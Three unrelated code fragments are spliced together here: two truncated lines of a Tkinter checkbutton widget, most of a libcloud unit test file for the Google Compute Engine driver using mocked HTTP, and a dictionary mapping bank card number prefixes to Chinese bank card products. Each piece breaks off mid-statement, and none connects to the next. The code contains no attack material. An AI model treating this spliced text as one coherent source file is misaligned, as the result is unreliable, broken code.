self.checkbutton_selected_background = kw.get('checkbutton_selected_background',[self.listbox.cget('selectbackground')]*len(self.checkbuttons))
self.checkbutton_selected_foreground = | |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for Google Compute Engine Driver
"""
import datetime
import mock
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.gce import (
GCENodeDriver, API_VERSION, timestamp_to_datetime, GCEAddress, GCEBackend,
GCEBackendService, GCEFirewall, GCEForwardingRule, GCEHealthCheck,
GCENetwork, GCENodeImage, GCERoute, GCERegion, GCETargetHttpProxy,
GCEUrlMap, GCEZone, GCESubnetwork, GCEProject)
from libcloud.common.google import (GoogleBaseAuthConnection,
ResourceNotFoundError, ResourceExistsError,
GoogleBaseError)
from libcloud.test.common.test_google import GoogleAuthMockHttp, GoogleTestCase
from libcloud.compute.base import Node, StorageVolume
from libcloud.compute.types import NodeState
from libcloud.test import MockHttp
from libcloud.test.compute import TestCaseMixin
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.test.secrets import GCE_PARAMS, GCE_KEYWORD_PARAMS
class GCENodeDriverTest(GoogleTestCase, TestCaseMixin):
"""
Google Compute Engine Test Class.
"""
# Mock out a few specific calls that interact with the user, system or
# environment.
GCEZone._now = lambda x: datetime.datetime(2013, 6, 26, 19, 0, 0)
datacenter = 'us-central1-a'
def setUp(self):
GCEMockHttp.test = self
GCENodeDriver.connectionCls.conn_class = GCEMockHttp
GoogleBaseAuthConnection.conn_class = GoogleAuthMockHttp
GCEMockHttp.type = None
kwargs = GCE_KEYWORD_PARAMS.copy()
kwargs['auth_type'] = 'IA'
kwargs['datacenter'] = self.datacenter
self.driver = GCENodeDriver(*GCE_PARAMS, **kwargs)
def test_default_scopes(self):
self.assertIsNone(self.driver.scopes)
def test_build_service_account_gce_struct_default_service_account(self):
result = self.driver._build_service_accounts_gce_list(service_accounts=None)
self.assertEqual(result, [
{'email': 'default',
'scopes': ['https://www.googleapis.com/auth/devstorage.read_only']
}
])
def test_build_service_account_gce_struct_no_service_account(self):
result = self.driver._build_service_accounts_gce_list(service_accounts=[])
self.assertEqual(result, [])
def test_build_service_account_gce_struct_custom_service_account(self):
data = [
{'email': '1', 'scopes': ['a']},
{'email': '2', 'scopes': ['b']}
]
expected_result = [
{'email': '1', 'scopes': ['https://www.googleapis.com/auth/a']},
{'email': '2', 'scopes': ['https://www.googleapis.com/auth/b']}
]
result = self.driver._build_service_accounts_gce_list(service_accounts=data)
self.assertEqual(result, expected_result)
def test_timestamp_to_datetime(self):
timestamp1 = '2013-06-26T10:05:19.340-07:00'
datetime1 = datetime.datetime(2013, 6, 26, 17, 5, 19)
self.assertEqual(timestamp_to_datetime(timestamp1), datetime1)
timestamp2 = '2013-06-26T17:43:15.000-00:00'
datetime2 = datetime.datetime(2013, 6, 26, 17, 43, 15)
self.assertEqual(timestamp_to_datetime(timestamp2), datetime2)
def test_get_object_by_kind(self):
obj = self.driver._get_object_by_kind(None)
self.assertIsNone(obj)
obj = self.driver._get_object_by_kind('')
self.assertIsNone(obj)
obj = self.driver._get_object_by_kind(
'https://www.googleapis.com/compute/v1/projects/project_name/'
'global/targetHttpProxies/web-proxy')
self.assertEqual(obj.name, 'web-proxy')
def test_get_region_from_zone(self):
zone1 = self.driver.ex_get_zone('us-central1-a')
expected_region1 = 'us-central1'
region1 = self.driver._get_region_from_zone(zone1)
self.assertEqual(region1.name, expected_region1)
zone2 = self.driver.ex_get_zone('europe-west1-b')
expected_region2 = 'europe-west1'
region2 = self.driver._get_region_from_zone(zone2)
self.assertEqual(region2.name, expected_region2)
def test_get_volume(self):
volume_name = 'lcdisk'
volume = self.driver.ex_get_volume(volume_name)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_get_volume_location(self):
volume_name = 'lcdisk'
location = self.driver.zone
volume = self.driver.ex_get_volume(volume_name, zone=location)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_get_volume_location_name(self):
volume_name = 'lcdisk'
location = self.driver.zone
volume = self.driver.ex_get_volume(volume_name, zone=location.name)
self.assertTrue(isinstance(volume, StorageVolume))
self.assertEqual(volume.name, volume_name)
def test_find_zone_or_region(self):
zone1 = self.driver._find_zone_or_region('libcloud-demo-np-node',
'instances')
self.assertEqual(zone1.name, 'us-central2-a')
zone2 = self.driver._find_zone_or_region(
'libcloud-demo-europe-np-node', 'instances')
self.assertEqual(zone2.name, 'europe-west1-a')
region = self.driver._find_zone_or_region('libcloud-demo-address',
'addresses', region=True)
self.assertEqual(region.name, 'us-central1')
def test_match_images(self):
project = 'debian-cloud'
image = self.driver._match_images(project, 'debian-7')
self.assertEqual(image.name, 'debian-7-wheezy-v20131120')
image = self.driver._match_images(project, 'backports')
self.assertEqual(image.name, 'backports-debian-7-wheezy-v20131127')
def test_build_disk_gce_struct(self):
device_name = 'disk_name'
disk_name = None
source = self.driver.ex_get_volume('lcdisk')
is_boot = True
# source as input
d = self.driver._build_disk_gce_struct(
device_name=device_name, source=source, disk_name=disk_name,
is_boot=is_boot)
self.assertEqual(source.extra['selfLink'], d['source'])
self.assertTrue(d['boot'])
self.assertTrue(d['autoDelete'])
self.assertEqual('READ_WRITE', d['mode'])
self.assertFalse('initializeParams' in d)
# image as input
device_name = 'disk_name'
disk_type = self.driver.ex_get_disktype('pd-ssd', 'us-central1-a')
image = self.driver.ex_get_image('debian-7')
source = None
is_boot = True
d = self.driver._build_disk_gce_struct(device_name=device_name,
disk_type=disk_type,
image=image, is_boot=is_boot)
self.assertEqual('READ_WRITE', d['mode'])
self.assertEqual('PERSISTENT', d['type'])
self.assertTrue('initializeParams' in d and
isinstance(d['initializeParams'], dict))
self.assertTrue(
all(k in d['initializeParams']
for k in ['sourceImage', 'diskType', 'diskName']))
self.assertTrue(d['initializeParams']['sourceImage'].startswith(
'https://'))
self.assertTrue(d['autoDelete'])
self.assertTrue(d['boot'])
def test_build_network_gce_struct(self):
network = self.driver.ex_get_network('lcnetwork')
address = self.driver.ex_get_address('lcaddress')
internalip = self.driver.ex_get_address('testaddress')
subnetwork_name = 'cf-972cf02e6ad49112'
subnetwork = self.driver.ex_get_subnetwork(subnetwork_name)
d = self.driver._build_network_gce_struct(network, subnetwork, address)
self.assertTrue('network' in d)
self.assertTrue('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
self.assertEqual(d['accessConfigs'][0]['natIP'], address.address)
# test with internal IP
d = self.driver._build_network_gce_struct(network, subnetwork, address,
internal_ip=internalip)
self.assertTrue('network' in d)
self.assertTrue('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
self.assertEqual(d['accessConfigs'][0]['natIP'], address.address)
self.assertEqual(d['networkIP'], internalip)
network = self.driver.ex_get_network('default')
d = self.driver._build_network_gce_struct(network)
self.assertTrue('network' in d)
self.assertFalse('subnetwork' in d)
self.assertTrue('kind' in d and
d['kind'] == 'compute#instanceNetworkInterface')
def test_build_scheduling_gce_struct(self):
self.assertFalse(
self.driver._build_scheduling_gce_struct(None, None, None))
# on_host_maintenance bad value should raise a Valueerror
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'on_host_maintenance="foobar"')
# on_host_maintenance is 'MIGRATE' and prempt is True
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'on_host_maintenance="MIGRATE"', 'preemptible=True')
# automatic_restart is True and prempt is True
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct,
'automatic_restart="True"', 'preemptible=True')
actual = self.driver._build_scheduling_gce_struct('TERMINATE', True,
False)
self.assertTrue('automaticRestart' in actual and
actual['automaticRestart'] is True)
self.assertTrue('onHostMaintenance' in actual and
actual['onHostMaintenance'] == 'TERMINATE')
self.assertTrue('preemptible' in actual)
self.assertFalse(actual['preemptible'])
def test_build_service_account_gce_struct(self):
self.assertRaises(ValueError,
self.driver._build_service_account_gce_struct, None)
input = {'scopes': ['compute-ro']}
actual = self.driver._build_service_account_gce_struct(input)
self.assertTrue('email' in actual)
self.assertTrue('scopes' in actual)
input = {'scopes': ['compute-ro'], 'email': '<EMAIL>'}
actual = self.driver._build_service_account_gce_struct(input)
self.assertTrue('email' in actual)
self.assertEqual(actual['email'], '<EMAIL>')
self.assertTrue('scopes' in actual)
def test_build_service_account_gce_list(self):
# ensure we have a list
self.assertRaises(ValueError,
self.driver._build_service_accounts_gce_list, 'foo')
# no input
actual = self.driver._build_service_accounts_gce_list()
self.assertTrue(len(actual) == 1)
self.assertTrue('email' in actual[0])
self.assertTrue('scopes' in actual[0])
def test_get_selflink_or_name(self):
network = self.driver.ex_get_network('lcnetwork')
# object as input
actual = self.driver._get_selflink_or_name(network, False, 'network')
self.assertEqual('lcnetwork', actual)
actual = self.driver._get_selflink_or_name(network, True, 'network')
self.assertTrue(actual.startswith('https://'))
# name-only as input
actual = self.driver._get_selflink_or_name('lcnetwork', True,
'network')
self.assertTrue(actual.startswith('https://'))
actual = self.driver._get_selflink_or_name('lcnetwork', False,
'network')
self.assertTrue('lcnetwork', actual)
# if selflinks is true, we need objname
self.assertRaises(ValueError, self.driver._get_selflink_or_name,
'lcnetwork', True)
def test_ex_get_serial_output(self):
self.assertRaises(ValueError, self.driver.ex_get_serial_output, 'foo')
node = self.driver.ex_get_node('node-name', 'us-central1-a')
self.assertTrue(
self.driver.ex_get_serial_output(node),
'This is some serial\r\noutput for you.')
def test_ex_list(self):
d = self.driver
# Test the default case for all list methods
# (except list_volume_snapshots, which requires an arg)
for list_fn in (d.ex_list_addresses, d.ex_list_backendservices,
d.ex_list_disktypes, d.ex_list_firewalls,
d.ex_list_forwarding_rules, d.ex_list_healthchecks,
d.ex_list_networks, d.ex_list_subnetworks,
d.ex_list_project_images, d.ex_list_regions,
d.ex_list_routes, d.ex_list_snapshots,
d.ex_list_targethttpproxies, d.ex_list_targetinstances,
d.ex_list_targetpools, d.ex_list_urlmaps,
d.ex_list_zones, d.list_images, d.list_locations,
d.list_nodes, d.list_sizes, d.list_volumes):
full_list = [item.name for item in list_fn()]
li = d.ex_list(list_fn)
iter_list = [item.name for sublist in li for item in sublist]
self.assertEqual(full_list, iter_list)
# Test paging & filtering with a single list function as they require
# additional test fixtures
list_fn = d.ex_list_regions
for count, sublist in zip((2, 1), d.ex_list(list_fn).page(2)):
self.assertTrue(len(sublist) == count)
for sublist in d.ex_list(list_fn).filter('name eq us-central1'):
self.assertTrue(len(sublist) == 1)
self.assertEqual(sublist[0].name, 'us-central1')
def test_ex_list_addresses(self):
address_list = self.driver.ex_list_addresses()
address_list_all = self.driver.ex_list_addresses('all')
address_list_uc1 = self.driver.ex_list_addresses('us-central1')
address_list_global = self.driver.ex_list_addresses('global')
self.assertEqual(len(address_list), 2)
self.assertEqual(len(address_list_all), 5)
self.assertEqual(len(address_list_global), 1)
self.assertEqual(address_list[0].name, 'libcloud-demo-address')
self.assertEqual(address_list_uc1[0].name, 'libcloud-demo-address')
self.assertEqual(address_list_global[0].name, 'lcaddressglobal')
names = [a.name for a in address_list_all]
self.assertTrue('libcloud-demo-address' in names)
def test_ex_list_backendservices(self):
self.backendservices_mock = 'empty'
backendservices_list = self.driver.ex_list_backendservices()
self.assertListEqual(backendservices_list, [])
self.backendservices_mock = 'web-service'
backendservices_list = self.driver.ex_list_backendservices()
web_service = backendservices_list[0]
self.assertEqual(web_service.name, 'web-service')
self.assertEqual(len(web_service.healthchecks), 1)
self.assertEqual(len(web_service.backends), 2)
def test_ex_list_healthchecks(self):
healthchecks = self.driver.ex_list_healthchecks()
self.assertEqual(len(healthchecks), 3)
self.assertEqual(healthchecks[0].name, 'basic-check')
def test_ex_list_firewalls(self):
firewalls = self.driver.ex_list_firewalls()
self.assertEqual(len(firewalls), 5)
self.assertEqual(firewalls[0].name, 'default-allow-internal')
def test_ex_list_forwarding_rules(self):
forwarding_rules = self.driver.ex_list_forwarding_rules()
forwarding_rules_all = self.driver.ex_list_forwarding_rules('all')
forwarding_rules_uc1 = self.driver.ex_list_forwarding_rules(
'us-central1')
self.assertEqual(len(forwarding_rules), 2)
self.assertEqual(len(forwarding_rules_all), 2)
self.assertEqual(forwarding_rules[0].name, 'lcforwardingrule')
self.assertEqual(forwarding_rules_uc1[0].name, 'lcforwardingrule')
names = [f.name for f in forwarding_rules_all]
self.assertTrue('lcforwardingrule' in names)
def test_ex_list_forwarding_rules_global(self):
forwarding_rules = self.driver.ex_list_forwarding_rules(
global_rules=True)
self.assertEqual(len(forwarding_rules), 2)
self.assertEqual(forwarding_rules[0].name, 'http-rule')
names = [f.name for f in forwarding_rules]
self.assertListEqual(names, ['http-rule', 'http-rule2'])
def test_list_images(self):
local_images = self.driver.list_images()
all_deprecated_images = self.driver.list_images(
ex_include_deprecated=True)
debian_images = self.driver.list_images(ex_project='debian-cloud')
local_plus_deb = self.driver.list_images(
['debian-cloud', 'project_name'])
self.assertEqual(len(local_images), 50)
self.assertEqual(len(all_deprecated_images), 178)
self.assertEqual(len(debian_images), 2)
self.assertEqual(len(local_plus_deb), 4)
self.assertEqual(local_images[0].name, 'custom-image')
self.assertEqual(debian_images[1].name, 'debian-7-wheezy-v20131120')
def test_ex_destroy_instancegroup(self):
name = 'myname'
zone = 'us-central1-a'
uig = self.driver.ex_get_instancegroup(name, zone)
self.assertTrue(self.driver.ex_destroy_instancegroup(uig))
def test_ex_get_instancegroup(self):
name = 'myname'
loc = 'us-central1-a'
actual = self.driver.ex_get_instancegroup(name, loc)
self.assertEqual(actual.name, name)
self.assertEqual(actual.zone.name, loc)
def test_ex_create_instancegroup(self):
name = 'myname'
loc = 'us-central1-a'
actual = self.driver.ex_create_instancegroup(name, loc)
self.assertEqual(actual.name, name)
self.assertEqual(actual.zone.name, loc)
def test_ex_list_instancegroups(self):
loc = 'us-central1-a'
actual = self.driver.ex_list_instancegroups(loc)
self.assertTrue(len(actual) == 2)
self.assertEqual(actual[0].name, 'myname')
self.assertEqual(actual[1].name, 'myname2')
def test_ex_list_instancegroups_zone_attribute_not_present_in_response(self):
GCEMockHttp.type = 'zone_attribute_not_present'
loc = 'us-central1-a'
actual = self.driver.ex_list_instancegroups(loc)
self.assertTrue(len(actual) == 2)
self.assertEqual(actual[0].name, 'myname')
self.assertEqual(actual[1].name, 'myname2')
def test_ex_instancegroup_list_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
actual = self.driver.ex_instancegroup_list_instances(gceobj)
self.assertTrue(len(actual) == 2)
for node in actual:
self.assertTrue(isinstance(node, Node))
self.assertEqual(loc, node.extra['zone'].name)
def test_ex_instancegroup_add_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
node_name = self.driver.ex_get_node('node-name', loc)
lcnode = self.driver.ex_get_node('lcnode-001', loc)
node_list = [node_name, lcnode]
self.assertTrue(
self.driver.ex_instancegroup_add_instances(gceobj, node_list))
def test_ex_instancegroup_remove_instances(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
node_name = self.driver.ex_get_node('node-name', loc)
lcnode = self.driver.ex_get_node('lcnode-001', loc)
node_list = [node_name, lcnode]
self.assertTrue(
self.driver.ex_instancegroup_remove_instances(gceobj, node_list))
def test_ex_instancegroup_set_named_ports(self):
name = 'myname'
loc = 'us-central1-a'
gceobj = self.driver.ex_get_instancegroup(name, loc)
named_ports = [{'name': 'foo', 'port': 4444}]
# base case
self.assertTrue(
self.driver.ex_instancegroup_set_named_ports(gceobj, named_ports))
# specify nothing, default is empty list
self.assertTrue(self.driver.ex_instancegroup_set_named_ports(gceobj))
# specify empty list
self.assertTrue(
self.driver.ex_instancegroup_set_named_ports(gceobj, []))
# raise valueerror if string is passed | |
'453242' : u'建设银行-VISA准贷记卡(银联卡)-准贷记卡',
'491031' : u'建设银行-VISA准贷记金卡-准贷记卡',
'524094' : u'建设银行-乐当家-借记卡',
'526410' : u'建设银行-乐当家-借记卡',
'53242' : u'建设银行-MASTER准贷记卡-准贷记卡',
'53243' : u'建设银行-乐当家-准贷记卡',
'544033' : u'建设银行-准贷记金卡-准贷记卡',
'552245' : u'建设银行-乐当家白金卡-借记卡',
'589970' : u'建设银行-金融复合IC卡-借记卡',
'620060' : u'建设银行-银联标准卡-借记卡',
'621080' : u'建设银行-银联理财钻石卡-借记卡',
'621081' : u'建设银行-金融IC卡-借记卡',
'621466' : u'建设银行-理财白金卡-借记卡',
'621467' : u'建设银行-社保IC卡-借记卡',
'621488' : u'建设银行-财富卡私人银行卡-借记卡',
'621499' : u'建设银行-理财金卡-借记卡',
'621598' : u'建设银行-福农卡-借记卡',
'621621' : u'建设银行-武警军人保障卡-借记卡',
'621700' : u'建设银行-龙卡通-借记卡',
'622280' : u'建设银行-银联储蓄卡-借记卡',
'622700' : u'建设银行-龙卡储蓄卡(银联卡)-借记卡',
'622707' : u'建设银行-准贷记卡-准贷记卡',
'622966' : u'建设银行-理财白金卡-借记卡',
'622988' : u'建设银行-理财金卡-借记卡',
'625955' : u'建设银行-准贷记卡普卡-准贷记卡',
'625956' : u'建设银行-准贷记卡金卡-准贷记卡',
'553242' : u'建设银行-龙卡信用卡-贷记卡',
'621082' : u'建设银行-建行陆港通龙卡-借记卡',
'621673' : u'中国建设银行-普通高中学生资助卡-借记卡',
'623211' : u'中国建设银行-中国旅游卡-借记卡',
'436742193' : u'建行厦门分行-龙卡储蓄卡-借记卡',
'622280193' : u'建行厦门分行-银联储蓄卡-借记卡',
'356896' : u'中国建设银行-龙卡JCB金卡-贷记卡',
'356899' : u'中国建设银行-龙卡JCB白金卡-贷记卡',
'356895' : u'中国建设银行-龙卡JCB普卡-贷记卡',
'436718' : u'中国建设银行-龙卡贷记卡公司卡-贷记卡',
'436738' : u'中国建设银行-龙卡贷记卡-贷记卡',
'436745' : u'中国建设银行-龙卡国际普通卡VISA-贷记卡',
'436748' : u'中国建设银行-龙卡国际金卡VISA-贷记卡',
'489592' : u'中国建设银行-VISA白金信用卡-贷记卡',
'531693' : u'中国建设银行-龙卡国际白金卡-贷记卡',
'532450' : u'中国建设银行-龙卡国际普通卡MASTER-贷记卡',
'532458' : u'中国建设银行-龙卡国际金卡MASTER-贷记卡',
'544887' : u'中国建设银行-龙卡万事达金卡-贷记卡',
'552801' : u'中国建设银行-龙卡贷记卡-贷记卡',
'557080' : u'中国建设银行-龙卡万事达白金卡-贷记卡',
'558895' : u'中国建设银行-龙卡贷记卡-贷记卡',
'559051' : u'中国建设银行-龙卡万事达信用卡-贷记卡',
'622166' : u'中国建设银行-龙卡人民币信用卡-贷记卡',
'622168' : u'中国建设银行-龙卡人民币信用金卡-贷记卡',
'622708' : u'中国建设银行-龙卡人民币白金卡-贷记卡',
'625964' : u'中国建设银行-龙卡IC信用卡普卡-贷记卡',
'625965' : u'中国建设银行-龙卡IC信用卡金卡-贷记卡',
'625966' : u'中国建设银行-龙卡IC信用卡白金卡-贷记卡',
'628266' : u'中国建设银行-龙卡银联公务卡普卡-贷记卡',
'628366' : u'中国建设银行-龙卡银联公务卡金卡-贷记卡',
'625362' : u'中国建设银行-中国旅游卡-贷记卡',
'625363' : u'中国建设银行-中国旅游卡-贷记卡',
'628316' : u'中国建设银行-龙卡IC公务卡-贷记卡',
'628317' : u'中国建设银行-龙卡IC公务卡-贷记卡',
'620021' : u'交通银行-交行预付卡-预付费卡',
'620521' : u'交通银行-世博预付IC卡-预付费卡',
'00405512' : u'交通银行-太平洋互连卡-借记卡',
'0049104' : u'交通银行-太平洋信用卡-贷记卡',
'0053783' : u'交通银行-太平洋信用卡-贷记卡',
'00601428' : u'交通银行-太平洋万事顺卡-借记卡',
'405512' : u'交通银行-太平洋互连卡(银联卡)-借记卡',
'434910' : u'交通银行-太平洋白金信用卡-贷记卡',
'458123' : u'交通银行-太平洋双币贷记卡-贷记卡',
'458124' : u'交通银行-太平洋双币贷记卡-贷记卡',
'49104' : u'交通银行-太平洋信用卡-贷记卡',
'520169' : u'交通银行-太平洋双币贷记卡-贷记卡',
'522964' : u'交通银行-太平洋白金信用卡-贷记卡',
'53783' : u'交通银行-太平洋信用卡-贷记卡',
'552853' : u'交通银行-太平洋双币贷记卡-贷记卡',
'601428' : u'交通银行-太平洋万事顺卡-借记卡',
'622250' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'622251' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'521899' : u'交通银行-太平洋双币贷记卡-贷记卡',
'622254' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622255' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622256' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622257' : u'交通银行-太平洋准贷记卡-准贷记卡',
'622258' : u'交通银行-太平洋借记卡-借记卡',
'622259' : u'交通银行-太平洋借记卡-借记卡',
'622253' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'622261' : u'交通银行-太平洋借记卡-借记卡',
'622284' : u'交通银行-太平洋MORE卡-准贷记卡',
'622656' : u'交通银行-白金卡-贷记卡',
'628216' : u'交通银行-交通银行公务卡普卡-贷记卡',
'622252' : u'交通银行-太平洋人民币贷记卡-贷记卡',
'66405512' : u'交通银行-太平洋互连卡-借记卡',
'6649104' : u'交通银行-太平洋信用卡-贷记卡',
'622260' : u'交通银行-太平洋借记卡-借记卡',
'66601428' : u'交通银行-太平洋万事顺卡-借记卡',
'955590' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955591' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955592' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'955593' : u'交通银行-太平洋贷记卡(银联卡)-贷记卡',
'6653783' : u'交通银行-太平洋信用卡-贷记卡',
'628218' : u'交通银行-交通银行公务卡金卡-贷记卡',
'622262' : u'交通银行-交银IC卡-借记卡',
'621069' : u'交通银行香港分行-交通银行港币借记卡-借记卡',
'620013' : u'交通银行香港分行-港币礼物卡-借记卡',
'625028' : u'交通银行香港分行-双币种信用卡-贷记卡',
'625029' : u'交通银行香港分行-双币种信用卡-贷记卡',
'621436' : u'交通银行香港分行-双币卡-借记卡',
'621002' : u'交通银行香港分行-银联人民币卡-借记卡',
'621335' : u'交通银行澳门分行-银联借记卡-借记卡',
'433670' : u'中信银行-中信借记卡-借记卡',
'433680' : u'中信银行-中信借记卡-借记卡',
'442729' : u'中信银行-中信国际借记卡-借记卡',
'442730' : u'中信银行-中信国际借记卡-借记卡',
'620082' : u'中信银行-中国旅行卡-借记卡',
'622690' : u'中信银行-中信借记卡(银联卡)-借记卡',
'622691' : u'中信银行-中信借记卡(银联卡)-借记卡',
'622692' : u'中信银行-中信贵宾卡(银联卡)-借记卡',
'622696' : u'中信银行-中信理财宝金卡-借记卡',
'622698' : u'中信银行-中信理财宝白金卡-借记卡',
'622998' : u'中信银行-中信钻石卡-借记卡',
'622999' : u'中信银行-中信钻石卡-借记卡',
'433671' : u'中信银行-中信借记卡-借记卡',
'968807' : u'中信银行-中信理财宝(银联卡)-借记卡',
'968808' : u'中信银行-中信理财宝(银联卡)-借记卡',
'968809' : u'中信银行-中信理财宝(银联卡)-借记卡',
'621771' : u'中信银行-借记卡-借记卡',
'621767' : u'中信银行-理财宝IC卡-借记卡',
'621768' : u'中信银行-理财宝IC卡-借记卡',
'621770' : u'中信银行-理财宝IC卡-借记卡',
'621772' : u'中信银行-理财宝IC卡-借记卡',
'621773' : u'中信银行-理财宝IC卡-借记卡',
'620527' : u'中信银行-主账户复合电子现金卡-借记卡',
'303' : u'光大银行-阳光卡-借记卡',
'356837' : u'光大银行-阳光商旅信用卡-贷记卡',
'356838' : u'光大银行-阳光商旅信用卡-贷记卡',
'486497' : u'光大银行-阳光商旅信用卡-贷记卡',
'622660' : u'光大银行-阳光卡(银联卡)-借记卡',
'622662' : u'光大银行-阳光卡(银联卡)-借记卡',
'622663' : u'光大银行-阳光卡(银联卡)-借记卡',
'622664' : u'光大银行-阳光卡(银联卡)-借记卡',
'622665' : u'光大银行-阳光卡(银联卡)-借记卡',
'622666' : u'光大银行-阳光卡(银联卡)-借记卡',
'622667' : u'光大银行-阳光卡(银联卡)-借记卡',
'622669' : u'光大银行-阳光卡(银联卡)-借记卡',
'622670' : u'光大银行-阳光卡(银联卡)-借记卡',
'622671' : u'光大银行-阳光卡(银联卡)-借记卡',
'622672' : u'光大银行-阳光卡(银联卡)-借记卡',
'622668' : u'光大银行-阳光卡(银联卡)-借记卡',
'622661' : u'光大银行-阳光卡(银联卡)-借记卡',
'622674' : u'光大银行-阳光卡(银联卡)-借记卡',
'90030' : u'光大银行-阳光卡(银联卡)-借记卡',
'622673' : u'光大银行-阳光卡(银联卡)-借记卡',
'620518' : u'光大银行-借记卡普卡-借记卡',
'621489' : u'光大银行-社会保障IC卡-借记卡',
'621492' : u'光大银行-IC借记卡普卡-借记卡',
'620535' : u'光大银行-手机支付卡-借记卡',
'623156' : u'光大银行-联名IC卡普卡-借记卡',
'621490' : u'光大银行-借记IC卡白金卡-借记卡',
'621491' : u'光大银行-借记IC卡金卡-借记卡',
'620085' : u'光大银行-阳光旅行卡-借记卡',
'623155' : u'光大银行-借记IC卡钻石卡-借记卡',
'623157' : u'光大银行-联名IC卡金卡-借记卡',
'623158' : u'光大银行-联名IC卡白金卡-借记卡',
'623159' : u'光大银行-联名IC卡钻石卡-借记卡',
'999999' : u'华夏银行-华夏卡(银联卡)-借记卡',
'621222' : u'华夏银行-华夏白金卡-借记卡',
'623020' : u'华夏银行-华夏普卡-借记卡',
'623021' : u'华夏银行-华夏金卡-借记卡',
'623022' : u'华夏银行-华夏白金卡-借记卡',
'623023' : u'华夏银行-华夏钻石卡-借记卡',
'622630' : u'华夏银行-华夏卡(银联卡)-借记卡',
'622631' : u'华夏银行-华夏至尊金卡(银联卡)-借记卡',
'622632' : u'华夏银行-华夏丽人卡(银联卡)-借记卡',
'622633' : u'华夏银行-华夏万通卡-借记卡',
'622615' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622616' : u'民生银行-民生银联借记卡-金卡-借记卡',
'622618' : u'民生银行-钻石卡-借记卡',
'622622' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622617' : u'民生银行-民生借记卡(银联卡)-借记卡',
'622619' : u'民生银行-民生借记卡(银联卡)-借记卡',
'415599' : u'民生银行-民生借记卡-借记卡',
'421393' : u'民生银行-民生国际卡-借记卡',
'421865' : u'民生银行-民生国际卡(银卡)-借记卡',
'427570' : u'民生银行-民生国际卡(欧元卡)-借记卡',
'427571' : u'民生银行-民生国际卡(澳元卡)-借记卡',
'472067' : u'民生银行-民生国际卡-借记卡',
'472068' : u'民生银行-民生国际卡-借记卡',
'622620' : u'民生银行-薪资理财卡-借记卡',
'621691' : u'民生银行-借记卡普卡-借记卡',
'545392' : u'民生银行-民生MasterCard-贷记卡',
'545393' : u'民生银行-民生MasterCard-贷记卡',
'545431' : u'民生银行-民生MasterCard-贷记卡',
'545447' : u'民生银行-民生MasterCard-贷记卡',
'356859' : u'民生银行-民生JCB信用卡-贷记卡',
'356857' : u'民生银行-民生JCB金卡-贷记卡',
'407405' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421869' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421870' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'421871' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'512466' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'356856' : u'民生银行-民生JCB普卡-贷记卡',
'528948' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'552288' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622600' : u'民生银行-民生信用卡(银联卡)-贷记卡',
'622601' : u'民生银行-民生信用卡(银联卡)-贷记卡',
'622602' : u'民生银行-民生银联白金信用卡-贷记卡',
'517636' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622621' : u'民生银行-民生银联个人白金卡-贷记卡',
'628258' : u'民生银行-公务卡金卡-贷记卡',
'556610' : u'民生银行-民生贷记卡(银联卡)-贷记卡',
'622603' : u'民生银行-民生银联商务信用卡-贷记卡',
'464580' : u'民生银行-民VISA无限卡-贷记卡',
'464581' : u'民生银行-民生VISA商务白金卡-贷记卡',
'523952' : u'民生银行-民生万事达钛金卡-贷记卡',
'545217' : u'民生银行-民生万事达世界卡-贷记卡',
'553161' : u'民生银行-民生万事达白金公务卡-贷记卡',
'356858' : u'民生银行-民生JCB白金卡-贷记卡',
'622623' : u'民生银行-银联标准金卡-贷记卡',
'625911' : u'民生银行-银联芯片普卡-贷记卡',
'377152' : u'民生银行-民生运通双币信用卡普卡-贷记卡',
'377153' : u'民生银行-民生运通双币信用卡金卡-贷记卡',
'377158' : u'民生银行-民生运通双币信用卡钻石卡-贷记卡',
'377155' : u'民生银行-民生运通双币标准信用卡白金卡-贷记卡',
'625912' : u'民生银行-银联芯片金卡-贷记卡',
'625913' : u'民生银行-银联芯片白金卡-贷记卡',
'406365' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
'406366' : u'广发银行股份有限公司-广发VISA信用卡-贷记卡',
